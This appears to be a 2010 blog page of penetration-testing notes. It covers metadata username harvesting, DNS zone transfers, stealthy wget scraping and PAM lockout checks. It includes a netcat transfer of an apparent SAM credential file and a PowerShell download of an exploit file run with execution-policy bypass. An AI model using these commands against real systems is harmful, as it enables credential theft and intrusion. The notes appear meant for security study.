Showing posts from December, 2010

How metadata files are retrieved from any given website

Custom user lists
• So, let's take some Word docs and pull out the user names and first and last names!
• What about the web?
wget -r -l1 --no-parent -A.doc http://www.somewebsite.com/
exiftool -r -a -u -Author -LastSavedBy * > users.txt
strings users.txt | cut -d":" -f2 | grep -v "=" | grep -v "image files read" | tr '[:space:]' '\n' | sort | uniq > cleanusers.txt
• Local disk?
exiftool -r -a -u -Author -LastSavedBy * > users.txt
strings users.txt | cut -d":" -f2 | grep -v "=" | grep -v "image files read" | tr '[:space:]' '\n' | sort | uniq > cleanusers.txt
More info at http://www.pauldotcom.com/Metadata_the_Silent_Killer_NS2009.pdf
================================================================
Exclude htm, html, php, asp and cgi extensions:
# wget -nd -r -R htm,html,php,asp,aspx,cgi -P /home/tools/metadata_from_[website_name] [target_domain]
Alternatively, we could have included only

dns / dnsstuff / whois / dig

whois at the command line
$ whois [-h whois_server] name
(there are many other command line arguments)
$ man whois
=====================
Zone transfer for all records of a given domain. It could be blocked on the DNS server or the firewall. DNS zone transfers are carried over TCP 53, whereas DNS queries use UDP 53.
nslookup
set type=any
server ns1.abc.abc
ls -d abc.abc > dnstransfer.abc.abc.txt
=====================
What is DNS Authority? What is an Authoritative DNS Server? What is an Authoritative DNS Response? What is a Non-Authoritative DNS Server? What is a Non-Authoritative DNS Server Response?
What is DNS Authority?
Any DNS server that contains a complete copy of the domain's zone file is considered to be authoritative for that domain. A complete copy of a zone file must have: a valid Start of Authority (SOA) record, valid Name Server (NS) records for the domain, and the listed NS records should match the servers listed in the SOA record. Servers listed in the

file transfer

Moving files using nc.exe
From the receiving machine run this cmd:
> nc -n -l -p 2222 > /tmp/sam.txt
From the sending machine run this cmd:
> nc -v -n -w3 ip_of_the_receiving_pc 2222 < sam.txt
===
File transfer script using ftp. Remove the space after each cmd and before the >> sign.
PowerShell script to download a file:
$storage = $pwd
$webclient = New-Object System.Net.WebClient
$url = "http://10.0.1.5/exploit.php"
$file = "exploit.php"
$webclient.DownloadFile($url,$file)
C:\powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File get.ps1
PowerShell FTP upload and download, from https://www.thomasmaurer.ch/2010/11/powershell-ftp-upload-and-download/
======
Creating a file remotely
echo 'Some Text' > /remotefile.txt
========

Use wget to download content from a site

wget --wait=20 --limit-rate=20K -r -p -U Mozilla http://www.stupidsite.com/restricedplace.html
1) -r = download sites recursively
2) -U = tells the site you are using some commonly accepted browser
3) --limit-rate= and 4) --wait=. You should add --wait=20 to pause 20 seconds between retrievals; this makes sure you are not manually added to a blacklist. --limit-rate defaults to bytes; add K to set KB/s.
5) --no-parent is a very handy option that guarantees wget will not download anything from the folders beneath the folder you want to acquire. Use this to make sure wget does not fetch more than it needs to if you just want to download the files in a folder.
Source: http://linuxreviews.org/quicktips/wget/

Penetration Testing Framework 0.57

Network Footprinting (Reconnaissance)
The tester would attempt to gather as much information as possible about the selected network. Reconnaissance can take two forms, i.e. active and passive. A passive attack is always the best starting point, as this would normally defeat intrusion detection systems and other forms of protection etc. afforded to the network. This would usually involve trying to discover publicly available information by utilising a web browser and visiting newsgroups etc. An active form would be more intrusive and may show up in audit logs, and may take the form of an attempted DNS zone transfer or a social engineering type of attack.
http://www.vulnerabilityassessment.co.uk/

Lectures, audio and video

http://www.kalamullah.com/lectures.html
http://www.hoor-al-ayn.com/lectures/abu-adnan/
http://www.kalamullah.com/?C=N;O=D
http://www.aswatalislam.net/
http://www.alquranic.com/downloads/
http://nadeem.lightuponlight.com/indexaudios.html
http://nadeem.lightuponlight.com/

Pwd attack, Unix account lockout

Welcome to the official THC web site. THC is an acronym for 'The Hacker's Choice' and a group of international experts involved in network and system security. The group looks back on a long history: it was founded in 1995 and has published over 70 technical papers and software releases covering a wide range of computer security aspects. Currently, THC is among the top non-commercial security groups worldwide.
http://freeworld.thc.org/
========================================
Linux/Unix account lockout with PAM tally
To check whether account lockout is in use:
# grep -r tally /etc/pam.d
If /etc/pam.conf is in use, the command would be
# grep tally /etc/pam.conf
If PAM is being used for account lockout, the output should look like
auth required /lib/security/pam_tally.so deny=5 onerr=fail lock_time=180 reset no_magic_root
Description: for authentication (auth) for the given service, we require the system to run the library called pam_tally.so, which is configured to deny access after 5 bad login attempts